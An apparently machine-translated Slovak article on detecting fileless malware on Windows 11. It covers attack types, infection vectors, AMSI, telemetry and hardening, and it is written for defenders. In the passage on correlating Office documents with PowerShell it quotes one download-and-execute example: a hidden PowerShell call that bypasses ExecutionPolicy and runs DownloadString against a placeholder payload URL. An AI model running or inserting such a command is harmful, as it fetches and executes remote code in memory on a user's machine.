Ako zistiť nebezpečný malvér bez súborov v systéme Windows 11

¿Ako odhaliť nebezpečný bezsúborový malvér? Aktivita útokov bez súborov výrazne vzrástla a aby toho nebolo málo, Windows 11 nie je imúnnyTento prístup obchádza disk a spolieha sa na pamäť a legitímne systémové nástroje; preto majú antivírusové programy založené na podpisoch problémy. Ak hľadáte spoľahlivý spôsob, ako ho zistiť, odpoveď spočíva v kombinácii telemetria, analýza správania a ovládacie prvky systému Windows.

V súčasnom ekosystéme kampane zneužívajúce PowerShell, WMI alebo Mshta koexistujú so sofistikovanejšími technikami, ako sú injekcie do pamäte, perzistencia „bez dotyku“ disku a dokonca... zneužitie firmvéruKľúčom je pochopiť mapu hrozieb, fázy útoku a aké signály zanechávajú, aj keď sa všetko deje v RAM.

Čo je to bezsúborový malvér a prečo je problémom v systéme Windows 11?

Keď hovoríme o hrozbách „bez súborov“, máme na mysli škodlivý kód, ktorý Nemusíte ukladať nové spustiteľné súbory v súborovom systéme, aby fungoval. Zvyčajne sa vkladá do bežiacich procesov a vykonáva sa v pamäti RAM, pričom sa spolieha na interprety a binárne súbory podpísané spoločnosťou Microsoft (napr. PowerShell, WMI, rundll32, mshtaVďaka tomu sa znižuje vaša náročnosť a umožňuje sa obísť vyhľadávače, ktoré hľadajú iba podozrivé súbory.

Dokonca aj kancelárske dokumenty alebo súbory PDF, ktoré zneužívajú zraniteľnosti na spúšťanie príkazov, sa považujú za súčasť tohto javu, pretože aktivovať vykonávanie v pamäti bez ponechania užitočných binárnych súborov na analýzu. Zneužívanie makrá a DDE V balíku Office, keďže kód beží v legitímnych procesoch, ako je WinWord.

Útočníci kombinujú sociálne inžinierstvo (phishing, spamové odkazy) s technickými pascami: kliknutie používateľa spustí reťazec, v ktorom skript stiahne a vykoná finálnu dátovú záťaž v pamäti, vyhýbanie sa zanechávaniu stopy na disku. Ciele siahajú od krádeže dát cez spustenie ransomvéru až po tichý laterálny pohyb.

Typológie podľa zastúpenia v systéme: od „čistých“ po hybridné

Aby sa predišlo nejasnostiam, je užitočné oddeliť hrozby podľa stupňa ich interakcie so súborovým systémom. Táto kategorizácia objasňuje Čo pretrváva, kde kód žije a aké stopy zanecháva?.

Typ I: žiadna aktivita súborov

Úplne bezsúborový malvér nezapisuje nič na disk. Klasickým príkladom je zneužitie zraniteľnosť siete (ako vektor EternalBlue v minulosti) na implementáciu zadných vrátok nachádzajúcich sa v pamäti jadra (prípady ako DoublePulsar). V tomto prípade sa všetko deje v RAM a v súborovom systéme nie sú žiadne artefakty.

Ďalšou možnosťou je kontaminácia firmware komponentov: BIOS/UEFI, sieťové adaptéry, periférie USB (techniky typu BadUSB) alebo dokonca subsystémy CPU. Pretrvávajú aj po reštartovaní a preinštalovaní, čo je spojené s dodatočnou ťažkosťou, ktorú Len málo produktov kontroluje firmvérIde o zložité útoky, menej časté, ale nebezpečné kvôli svojej nenápadnosti a odolnosti.

Typ II: Nepriama archivačná činnosť

V tomto prípade malvér „neopúšťa“ svoj vlastný spustiteľný súbor, ale používa systémom spravované kontajnery, ktoré sú v podstate uložené ako súbory. Napríklad zadné vrátka, ktoré umiestňujú príkazy powershell v repozitári WMI a spúšťať jeho vykonávanie pomocou filtrov udalostí. Je možné ho nainštalovať z príkazového riadku bez vymazania binárnych súborov, ale repozitár WMI sa nachádza na disku ako legitímna databáza, čo sťažuje jeho čistenie bez ovplyvnenia systému.

Z praktického hľadiska sa považujú za bezsúborové, pretože daný kontajner (WMI, register atď.) Nie je to klasický detekovateľný spustiteľný súbor A jeho čistenie nie je triviálne. Výsledkom je nenápadné pretrvávanie s malou „tradičnou“ stopou.

Typ III: Na fungovanie sú potrebné súbory

V niektorých prípadoch sa zachováva perzistencia bez súborov Na logickej úrovni potrebujú spúšťač založený na súbore. Typickým príkladom je Kovter: zaregistruje shellové sloveso pre náhodnú príponu; keď sa otvorí súbor s touto príponou, spustí sa malý skript pomocou mshta.exe, ktorý rekonštruuje škodlivý reťazec z registra.

Trik spočíva v tom, že tieto „návnadové“ súbory s náhodnými príponami neobsahujú analyzovateľné užitočné zaťaženie a väčšina kódu sa nachádza v registrácia (iný kontajner). Preto sú kategorizované ako bezsúborové, čo sa týka dopadu, aj keď prísne vzaté, sú závislé od jedného alebo viacerých artefaktov disku ako spúšťača.

Vektory a „hostitelia“ infekcie: kam vstupuje a kde sa skrýva

Pre zlepšenie detekcie je nevyhnutné zmapovať vstupný bod a hostiteľa infekcie. Táto perspektíva pomáha pri navrhovaní špecifické kontroly Uprednostnite vhodnú telemetriu.

exploity

• Súborové (Typ III): Dokumenty, spustiteľné súbory, staršie súbory Flash/Java alebo súbory LNK môžu zneužiť prehliadač alebo engine, ktorý ich spracováva, na načítanie shellcode do pamäte. Prvým vektorom je súbor, ale užitočné zaťaženie putuje do pamäte RAM.
• Sieťové (Typ I): Balík zneužívajúci zraniteľnosť (napr. v SMB) sa spustí v používateľskom prostredí alebo jadre. WannaCry tento prístup spopularizoval. Priame načítanie pamäte bez nového súboru.

technické vybavenie

• zariadení (Typ I): Firmvér disku alebo sieťovej karty je možné zmeniť a doňho je možné vložiť kód. Je ťažké ho skontrolovať a pretrváva mimo operačného systému.
• CPU a riadiace subsystémy (Typ I): Technológie ako ME/AMT od spoločnosti Intel preukázali možnosti Sieťovanie a vykonávanie mimo operačného systémuÚtočí na veľmi nízkej úrovni s vysokým potenciálom nenápadnosti.
• USB (Typ I): BadUSB vám umožňuje preprogramovať USB disk tak, aby sa vydával za klávesnicu alebo sieťovú kartu a spúšťal príkazy alebo presmeroval prevádzku.
• BIOS / UEFI (Typ I): preprogramovanie škodlivého firmvéru (prípady ako Mebromi), ktoré sa spustí pred spustením systému Windows.
• Hypervízor (Typ I): Implementácia mini-hypervízora pod OS na skrytie jeho prítomnosti. Zriedkavé, ale už pozorované vo forme hypervizorových rootkitov.

Vykonanie a vstrekovanie

• Súborové (Typ III): EXE/DLL/LNK alebo naplánované úlohy, ktoré spúšťajú injekcie do legitímnych procesov.
• Makrá (Typ III): VBA v balíku Office dokáže dekódovať a spúšťať užitočné dáta vrátane kompletného ransomvéru so súhlasom používateľa prostredníctvom podvodu.
• Skripty (Typ II): PowerShell, VBScript alebo JScript zo súboru, príkazový riadok, služby, registrácia alebo WMIÚtočník môže napísať skript vo vzdialenej relácii bez toho, aby sa dotkol disku.
• Bootovací záznam (MBR/Boot) (Typ II): Rodiny ako Petya prepíšu bootovací sektor, aby prevzali kontrolu pri spustení. Je mimo súborového systému, ale je prístupný operačnému systému a moderným riešeniam, ktoré ho dokážu obnoviť.

Ako fungujú útoky bez súborov: fázy a signály

Hoci nezanechávajú spustiteľné súbory, kampane sa riadia fázovou logikou. Ich pochopenie umožňuje monitorovanie. udalosti a vzťahy medzi procesmi ktoré zanechávajú stopu.

• Počiatočný prístupPhishingové útoky s použitím odkazov alebo príloh, napadnutých webových stránok alebo ukradnutých prihlasovacích údajov. Mnohé reťazce začínajú dokumentom balíka Office, ktorý spúšťa príkaz. PowerShell.
• Vytrvalosť: zadné vrátka cez WMI (filtre a predplatné), Kľúče spustenia v registri alebo naplánované úlohy, ktoré reštartujú skripty bez nového škodlivého súboru.
• ExfiltráciaPo zhromaždení informácií sa odošlú zo siete pomocou dôveryhodných procesov (prehliadače, PowerShell, bitsadmin) na zmiešanie prevádzky.

Tento vzorec je obzvlášť zákerný, pretože indikátory útoku Skrývajú sa v normálnosti: argumenty príkazového riadka, reťazenie procesov, anomálne odchádzajúce pripojenia alebo prístup k API pre vkladanie.

Bežné techniky: od pamäte k nahrávaniu

Herci sa spoliehajú na celý rad metódy ktoré optimalizujú nenápadnosť. Je užitočné poznať tie najbežnejšie na aktiváciu účinnej detekcie.

• Obyvateľ v pamätiNačítanie dát do priestoru dôveryhodného procesu, ktorý čaká na aktiváciu. rootkity a hooky V jadre zvyšujú úroveň utajenia.
• Perzistencia v registriUložte zašifrované bloby do kľúčov a rehydratujte ich z legitímneho spúšťača (mshta, rundll32, wscript). Dočasný inštalátor sa môže samodeštruktívne zničiť, aby minimalizoval svoju environmentálnu stopu.
• Phishing povereníÚtočník pomocou ukradnutých používateľských mien a hesiel spúšťa vzdialené shellové a plantové príkazy. tichý prístup v registri alebo WMI.
• „Bezsúborový“ ransomvérŠifrovanie a komunikácia C2 sú riadené z pamäte RAM, čo znižuje možnosti odhalenia, kým nie je poškodenie viditeľné.
• Operačné súpravy: automatizované reťazce, ktoré zisťujú zraniteľnosti a po kliknutí používateľa nasadzujú užitočné zaťaženie iba v pamäti.
• Dokumenty s kódommakrá a mechanizmy ako DDE, ktoré spúšťajú príkazy bez ukladania spustiteľných súborov na disk.

Priemyselné štúdie už ukázali pozoruhodné vrcholy: v jednom období roku 2018 nárast o viac ako 90 % pri útokoch založených na skriptoch a reťazcoch PowerShell je to znak toho, že vektor je preferovaný pre svoju účinnosť.

Výzva pre spoločnosti a dodávateľov: prečo blokovanie nestačí

Bolo by lákavé vypnúť PowerShell alebo navždy zakázať makrá, ale Prerušil by si operáciuPowerShell je pilierom modernej administratívy a Office je v podnikaní nevyhnutný; slepé blokovanie často nie je možné.

Okrem toho existujú spôsoby, ako obísť základné ovládacie prvky: spúšťanie PowerShellu cez DLL a rundll32, balenie skriptov do EXE súborov, Prineste si vlastnú kópiu PowerShellu alebo dokonca skryť skripty v obrázkoch a extrahovať ich do pamäte. Obhajoba sa preto nemôže zakladať výlučne na popieraní existencie nástrojov.

Ďalšou častou chybou je delegovanie celého rozhodnutia na cloud: ak agent musí čakať na odpoveď zo servera, Stratíte prevenciu v reálnom časeTelemetrické údaje je možné nahrať na obohatenie informácií, ale Zmiernenie sa musí uskutočniť v koncovom bode.

Ako zistiť bezsúborový malvér v systéme Windows 11: telemetria a správanie

Víťazná stratégia je monitorovanie procesov a pamäteNie súbory. Škodlivé správanie je stabilnejšie ako forma, ktorú súbor nadobúda, vďaka čomu je ideálne pre preventívne mechanizmy.

• AMSI (rozhranie antivírusovej kontroly)Zachytáva skripty PowerShell, VBScript alebo JScript, aj keď sú dynamicky zostavené v pamäti. Vynikajúci na zachytenie obfuskovaných reťazcov pred ich spustením.
• Monitorovanie procesovštart/cieľ, PID, rodičia a deti, trasy, príkazové riadky a haše, plus stromy vykonávania, aby ste pochopili celý príbeh.
• Analýza pamätedetekcia injekcií, reflexných alebo PE zaťažení bez dotyku disku a kontrola nezvyčajných spustiteľných oblastí.
• Ochrana štartovacieho sektora: kontrola a obnova MBR/EFI v prípade neoprávnenej manipulácie.

V ekosystéme spoločnosti Microsoft kombinuje Defender for Endpoint AMSI, monitorovanie správaniaNa škálovanie detekcie proti novým alebo zahaleným variantom sa používa skenovanie pamäte a cloudové strojové učenie. Iní dodávatelia používajú podobné prístupy s jadrami rezidentnými v jadre.

Realistický príklad korelácie: z dokumentu do PowerShellu

Predstavte si reťazec, v ktorom Outlook stiahne prílohu, Word otvorí dokument, povolí sa aktívny obsah a spustí sa PowerShell s podozrivými parametrami. Správna telemetria by ukázala... Príkazový riadok (napr. obídenie ExecutionPolicy, skryté okno), pripojenie k nedôveryhodnej doméne a vytvorenie podradeného procesu, ktorý sa nainštaluje do AppData.

Agent s lokálnym kontextom je schopný zastaviť a cúvať škodlivej aktivity bez manuálneho zásahu, okrem oznámenia SIEM alebo prostredníctvom e-mailu/SMS. Niektoré produkty pridávajú vrstvu pripisovania hlavnej príčiny (modely typu StoryLine), ktorá nepoukazuje na viditeľný proces (Outlook/Word), ale na celé škodlivé vlákno a jeho pôvod na komplexné vyčistenie systému.

Typický vzor príkazu, na ktorý si treba dať pozor, môže vyzerať takto: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logika nie je presný reťazec, ale súbor signálovobídenie politík, skryté okno, vymazanie sťahovania a vykonávanie v pamäti.

AMSI, kanál a úloha každého aktéra: od koncového bodu po SOC

Okrem zachytávania skriptov robustná architektúra riadi kroky, ktoré uľahčujú vyšetrovanie a reakciu. Čím viac dôkazov pred vykonaním záťaže, tým lepšie., najlepšie.

• Zachytenie skriptuAMSI poskytuje obsah (aj keď je generovaný za behu) na statickú a dynamickú analýzu v rámci malvéru.
• Udalosti procesuZhromažďujú sa PID, binárne súbory, hashe, trasy a ďalšie údaje. argumenty, čím sa vytvorili procesné stromy, ktoré viedli k finálnemu zaťaženiu.
• Detekcia a hlásenieDetekcie sa zobrazujú v konzole produktu a preposielajú sa na sieťové platformy (NDR) na vizualizáciu kampane.
• Záruky pre používateľovAj keď je skript vložený do pamäte, framework AMSI to zachytí v kompatibilných verziách systému Windows.
• Schopnosti správcu: konfigurácia politiky na povolenie kontroly skriptov, blokovanie na základe správania a vytváranie reportov z konzoly.
• Práca SOCextrakcia artefaktov (VM UUID, verzia operačného systému, typ skriptu, iniciačný proces a jeho rodič, haše a príkazové riadky) na obnovenie histórie a pravidlá pre výťahy budúcnosti.

Keď platforma umožňuje export vyrovnávacia pamäť V súvislosti s vykonaním môžu výskumníci generovať nové detekcie a obohatiť obranu proti podobným variantom.

Praktické opatrenia v systéme Windows 11: prevencia a lov

Okrem EDR s inšpekciou pamäte a AMSI vám systém Windows 11 umožňuje uzavrieť priestory pre útoky a zlepšiť viditeľnosť pomocou natívne ovládacie prvky.

• Registrácia a obmedzenia v PowerShellePovoľuje protokolovanie blokov skriptov a protokolovanie modulov, používa obmedzené režimy, kde je to možné, a riadi používanie Obísť/Skryť.
• Pravidlá redukcie útočnej plochy (ASR): blokuje spúšťanie skriptov procesmi balíka Office a Zneužívanie WMI/PSExec, keď nie je potrebný.
• Politiky makier balíka Office: predvolene zakáže interné podpisovanie makier a prísne zoznamy dôveryhodných používateľov; monitoruje staršie toky DDE.
• Audit a register WMImonitoruje odbery udalostí a automatické spúšťacie kľúče (Run, RunOnce, Winlogon), ako aj vytváranie úloh naplánovaný.
• Ochrana pri spustení: aktivuje funkciu Secure Boot, kontroluje integritu MBR/EFI a overuje, či pri spustení nedošlo k žiadnym úpravám.
• Oprava a kalenie: odstraňuje zneužiteľné zraniteľnosti v prehliadačoch, komponentoch balíka Office a sieťových službách.
• povedomieškolí používateľov a technické tímy v oblasti phishingu a signálov tajné popravy.

Pri hľadaní sa zamerajte na otázky týkajúce sa: vytvárania procesov v Office smerom k PowerShellu/MSHTA, argumentov s sťahovací reťazec/sťahovací súborSkripty s jasným obfuskačným rozhraním, reflexnými injekciami a odchádzajúcimi sieťami do podozrivých TLD. Prekryte tieto signály reputáciou a frekvenciou, aby ste znížili šum.

Čo dokáže dnes každý motor zistiť?

Podnikové riešenia od spoločnosti Microsoft kombinujú AMSI, behaviorálnu analytiku, skúmať pamäť a ochranu bootovacieho sektora plus cloudové modely strojového učenia na škálovanie proti novým hrozbám. Iní dodávatelia implementujú monitorovanie na úrovni jadra na rozlíšenie škodlivého softvéru od neškodného s automatickým vrátením zmien.

Prístup založený na príbehy o popravách Umožňuje vám identifikovať hlavnú príčinu (napríklad prílohu Outlooku, ktorá spúšťa reťazec) a zmierniť celý strom: skripty, kľúče, úlohy a prechodné binárne súbory, čím sa zabráni tomu, aby ste sa zasekli na viditeľnom príznaku.

Časté chyby a ako sa im vyhnúť

Blokovanie PowerShellu bez alternatívneho plánu správy je nielen nepraktické, ale existujú aj... spôsoby, ako ho nepriamo vyvolaťTo isté platí pre makrá: buď ich spravujete pomocou politík a podpisov, alebo utrpí podnikanie. Je lepšie zamerať sa na telemetriu a pravidlá správania.

Ďalšou častou chybou je presvedčenie, že pridávanie aplikácií na bielu listinu rieši všetko: technológia bez súborov sa práve na to spolieha. dôveryhodné aplikácieKontrola by mala sledovať, čo robia a ako sa k tomu vzťahujú, nielen to, či im to je dovolené.

Vďaka všetkému vyššie uvedenému prestáva byť bezsúborový malvér „duchom“, keď sledujete to, na čom skutočne záleží: správanie, pamäť a pôvod každého spustenia. Kombinácia AMSI, bohatej telemetrie procesov, natívnych ovládacích prvkov systému Windows 11 a vrstvy EDR s analýzou správania vám dáva výhodu. Pridajte k tomu realistické politiky pre makrá a PowerShell, audit WMI/registra a vyhľadávanie, ktoré uprednostňuje príkazové riadky a stromy procesov, a máte obranu, ktorá preruší tieto reťazce skôr, ako vydajú zvuk.